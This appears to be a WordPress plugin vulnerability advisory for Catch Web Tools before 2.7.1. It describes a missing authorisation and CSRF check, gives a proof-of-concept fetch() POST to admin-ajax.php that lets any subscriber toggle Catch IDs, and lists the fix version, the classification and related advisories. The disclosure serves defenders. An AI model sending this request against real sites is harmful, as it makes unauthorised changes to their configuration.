Catch Web Tools < 2.7.1 – Subscriber+ Arbitrary Catch IDs Activation/Deactivation | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF check in its catchwebtools_catchids_switch AJAX action, allowing any authenticated users, such as subscriber to activate/disable Catch IDs

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"catchwebtools_catchids_switch", "option_name": "status", "value": "true"}),
  "method": "POST",
  "credentials": "include"
})

Affects Plugins

catch-web-tools

Fixed in 2.7.1

References

URL

https://plugins.trac.wordpress.org/changeset/2661549

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Jan w Oleju

Submitter

Jan w Oleju

Verified

Yes

WPVDB ID

34e3e398-ad1f-4537-832b-0ca58686191a

Timeline

Publicly Published

2022-01-24 (about 4 years ago)

Added

2022-01-24 (about 4 years ago)

Last Updated

2022-01-24 (about 4 years ago)

Other

Published

Title

Published

2024-06-21

Title

Optinly < 1.0.19 - Missing Authorization

Published

2023-03-22

Title

W4 Post List < 2.4.6 - Subscriber+ Password Protected Post Content Disclosure

Published

2023-10-13

Title

RumbleTalk Live Group Chat < 6.2.0 - Missing Authorization via handleRequest

Published

2025-12-04

Title

Wp Social Login and Register Social Counter < 3.1.4 - Missing Authorization in Cache REST Endpoints to Social Counter Tampering

Published

2024-04-29

Title

Print Labels with Barcodes < 3.4.7 - Subscriber+ Settings/Profiles Update, Templates/Barcodes Access/Creation/Edition/Deletion